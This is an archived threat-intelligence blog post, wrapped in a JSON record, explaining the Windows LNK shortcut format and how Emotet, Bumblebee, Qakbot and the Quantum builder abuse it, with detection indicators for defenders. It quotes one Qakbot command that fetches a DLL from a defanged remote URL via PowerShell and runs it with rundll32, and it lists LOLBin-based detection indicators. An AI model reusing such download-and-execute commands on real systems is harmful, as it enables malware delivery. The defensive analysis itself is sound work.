{
	"id": "7ad8522a-6817-4ce4-b22d-b03c537bcef2",
	"created_at": "2026-04-06T00:12:49.467833Z",
	"updated_at": "2026-04-10T03:21:19.488798Z",
	"deleted_at": null,
	"sha1_hash": "83f81ebf23830ac896d1b46e55617138e115ee75",
	"title": "How LNK Files Are Abused by Threat Actors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 432711,
	"plain_text": "How LNK Files Are Abused by Threat Actors\r\nBy Nicole Fishbein\r\nPublished: 2022-11-10 · Archived: 2026-04-02 12:02:07 UTC\r\nLNK files are based on the Shell Link Binary file format, also known as Windows shortcuts. But what seems a\r\nrelatively simple ability to execute other binaries on the system can inflict great harm when abused by threat\r\nactors.\r\nMicrosoft’s decision to block macros by default for files downloaded from the internet in Office applications\r\nprovoked malware developers to shift to other techniques. Threat actors have identified the potential profit of\r\nusing LNK files in different stages of attacks, and we expect to see an increased number of attacks using LNK files,\r\nsuch as Bumblebee and Quantum Ransomware.\r\nIn this blog, we will cover the file format to understand better how threat actors use LNK files in the different\r\nstages of attacks. After getting familiar with the LNK (Shell Link) file format and its capabilities, we will present\r\nopen-source tools and methods to inspect and detect malicious LNK files in incident response and threat-hunting\r\nprocesses.\r\nWhat is the LNK File Format?\r\nThe five structures that compose a shell link binary (LNK) file.\r\nAccording to Microsoft’s documentation on Shell Link Binary files, the most common way to store Shell Link\r\nBinary files is by using the .lnk file extension. LNK files contain a reference to a location on the system referred\r\nto as a link target. The format consists of five structures: some are mandatory, while others are optional. We will\r\nnot cover every parameter in the structures, but focus on the parameters that can help identify suspicious LNK\r\nfiles.\r\n1. SHELL_LINK_HEADER – This is a mandatory structure that contains information and flags necessary for\r\nthe rest of the structures in the file.\r\nThe LinkFlags structure specifies which shell link structures (described below) are present in the file. 
For\r\nexample, if the HasRelativePath flag is set, RELATIVE_PATH in the STRING_DATA structure will\r\ncontain the relevant information.\r\nThe FileAttributesFlags structure holds information about the attributes of the link target. For example, if the\r\nFILE_ATTRIBUTE_DIRECTORY bit is set, the target is a directory rather than a file. The fields in this\r\nstructure can provide more context about the link target, which can help the investigation process.\r\nhttps://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/\r\nPage 1 of 5\n\nAccess, creation, and write time: these can be useful to determine the creation and modification time of the\r\nfile as part of an incident response process.\r\nThe HotKeyFlags structure specifies a combination of keys that will invoke the application.\r\n2. LINKTARGET_IDLIST – Specifies the target of the link using an ItemID structure.\r\n3. LINKINFO – Holds information about the location of a link target, including the volume, serial number, and local\r\npaths.\r\n4. STRING_DATA – Holds information about paths and interfaces for the link target. These structures are optional,\r\nand they will be present only if the appropriate flag in LinkFlags (in the ShellLinkHeader) is set. The following\r\nstructures can be useful in identifying malicious LNK files:\r\nRELATIVE_PATH: defines the location of the link target relative to the file that contains the shell link.\r\nWORKING_DIR: defines the file system path of the working directory to be used when activating the link\r\ntarget.\r\nCOMMAND_LINE_ARGUMENTS: stores the command-line arguments specified when activating the\r\nlink target.\r\n5. EXTRA_DATA – Optional structures that contain additional information about the link target.  
Of all of the\r\npossible structures, the following can be very useful in the investigation:\r\nIf the link target uses an environment variable, the EnvironmentVariableDataBlock structure will hold a\r\npath to environment variable information.\r\nTrackerDataBlock: this structure holds information that helps locate the link target if it wasn’t found in its\r\noriginal location. One of the fields is the MAC address of the machine where the link target was last seen.\r\nIf the MAC address specified in the LNK file doesn’t match the MAC address of the host, it means that the\r\nLNK was created on another machine. So we need to understand whether it’s a machine within the organization\r\nor an authorized entity, or whether the file was created and dropped by an attacker.\r\nHow LNK files are used by threat actors\r\nLNK files can execute any file on the system with arguments (path, arguments, etc.) based on the configuration\r\nprovided by the file’s creator. The content of the LNK file – what and how it will be executed – can be viewed\r\nusing different tools or just by right-clicking it to open the properties window of the file. But most users don’t\r\ncheck each LNK file before executing it. Essentially, LNK files provide attackers with an easy way to execute\r\nmalicious binaries or trusted living-off-the-land binaries (LOLBins).\r\nInspecting LNK files using the properties window.\r\nUsually, LNK files are used in the delivery stage of the attack. The goal of this stage is to deploy the next stage of\r\nthe attack or execute the malware. One of the ways to deliver the malicious files to the endpoint is using an\r\narchive file, a technique that, according to HP’s report from Q2 2022, attackers have started to use more extensively.\r\nRecently, attackers started to use LNK files as downloaders instead of packing the malicious code in the archive or\r\nusing other file formats, such as macros. 
To carry out the attack, LNK files are set to execute either PowerShell,\r\nVBScript, or MSHTA with pre-defined arguments, or to execute commands from another file that is dropped with the\r\nLNK file.\r\nEmotet used this technique in phishing emails sent to victims, including a password-protected zip file\r\nthat contained an LNK file disguised as a Word document that executes a VBS script which downloads malware.\r\nBumblebee, a new and advanced loader, uses an LNK file as part of the attack flow. So far, it has two versions,\r\none delivered as an ISO file and the later one as a VHD. In both cases, an LNK file is included. In the first version, the LNK\r\nexecuted the accompanying DLL, which contains the malicious payload. The later version is more advanced, and\r\nthe LNK file executes an attached PowerShell file that loads the second stage of the loader.\r\nSome malware developers took it one step further and created a tool for creating malicious LNK files called\r\nQuantum, which is sold on the dark web. It allows other criminals to create malicious files with extra capabilities\r\nsuch as UAC bypass, delayed execution, post-execution hiding, and a variety of double extensions.\r\nHow to Analyze and Detect Malicious LNK Files\r\nIn the process of incident response or threat hunting, when we have a suspicious file, we can choose to do static\r\nanalysis or dynamic analysis (or both). Executing an LNK file in a sandbox or a VM can greatly assist in\r\nidentifying suspicious activity. However, as we saw in the examples above, some attacks rely on additional files\r\nand parameters that the LNK file will execute. In this case, we will need to have all of the relevant files in the\r\ntesting environment, which is not always possible, so we fall back to static analysis.\r\nThere are multiple applications and tools to inspect the structure of an LNK file. 
In this post, we will use\r\nLnkParse3, a minimal Python 3 CLI tool that is easy to install and use. The result of the parsing is\r\npresented in a format that resembles the LNK structure described above.\r\nBased on LNK files that were used in previously reported attacks, we have gathered indicators that can help\r\nidentify suspicious LNK files. This information can be pulled from the LNK file using tools such as LnkParse3:\r\nLocal base path that points to legitimate Windows tools that can be used to execute scripts and open URLs:\r\ncmd, rundll32, PowerShell, MSHTA.\r\nSuspicious command-line arguments that contain:\r\nCommands like exec, frombase64, ping, VBScript, etc.\r\nA large number of command-line arguments – malicious LNK files that specify command-line\r\narguments often have more than four arguments. On top of that, the arguments can be obfuscated or\r\ninclude characters that are not letters or numbers. But in some cases, legitimate files such as web\r\nbrowsers can run processes with many arguments, resulting in shortcut files with many\r\ncommand-line arguments. In this case, the target and the working_dir locations can be very helpful in the\r\nanalysis and inspection of the command-line arguments.\r\nNetworking protocols and URLs such as HTTP, HTTPS, and IP addresses.\r\nThe file size is relatively large – which indicates that it contains lots of data, possibly a script. We noticed\r\nthat files bigger than 4 KB should be considered suspicious.\r\nFor example, below is the content of an LNK file used by Qakbot. 
It downloads a DLL from a remote location and\r\nexecutes it.\r\n“C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit iwr -Uri\r\nhxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile\r\n$env:TEMP\\test.dll;Start-Process rundll32.exe $env:TEMP\\test.dll,jhbvygftr”\r\nWe can then use URL reputation tools for analysis, like Intezer’s URL scanning feature shown below, to confirm\r\nthat the LNK file is opening a malicious link.\r\nIntezer’s URL scanner showing the malicious link opened by a .lnk file.\r\nSome of the indicators can differ based on what is considered common in the organization, for example, if it is\r\ncommon to have big LNK files that execute legitimate scripts. In this case, the indicators need to be tailored to\r\nthe organization, but overall malicious LNK files have a pattern that can be identified.\r\nOnce we have classified an LNK file as suspicious, we should inspect the executables and the commands that are\r\nbeing executed and identify what the purpose of the file is and whether the endpoint was compromised.\r\nConclusion\r\nWith the increasing use of LNK files by threat actors, defenders and incident responders must understand what\r\nthese files can do and how to work around them. 
In this blog, we covered the sections of the file format that can\r\nreveal suspicious indicators, then we presented real-life examples and an open-source tool that can be\r\nused to inspect LNK files.\r\nToo many alerts and suspicious files to investigate manually?\r\nIntezer’s technology automates SOC grunt work like analyzing suspicious files, by monitoring your alerts 24/7,\r\ninvestigating and triaging for you, kickstarting incident response, and helping you hunt down undetected threats.\r\nTry Intezer for yourself for free\r\nSource: https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/"
	],
	"report_names": [
		"how-threat-actors-abuse-lnk-files"
	],
	"threat_actors": [],
	"ts_created_at": 1775434369,
	"ts_updated_at": 1775791279,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/83f81ebf23830ac896d1b46e55617138e115ee75.pdf",
		"text": "https://archive.orkl.eu/83f81ebf23830ac896d1b46e55617138e115ee75.txt",
		"img": "https://archive.orkl.eu/83f81ebf23830ac896d1b46e55617138e115ee75.jpg"
	}
}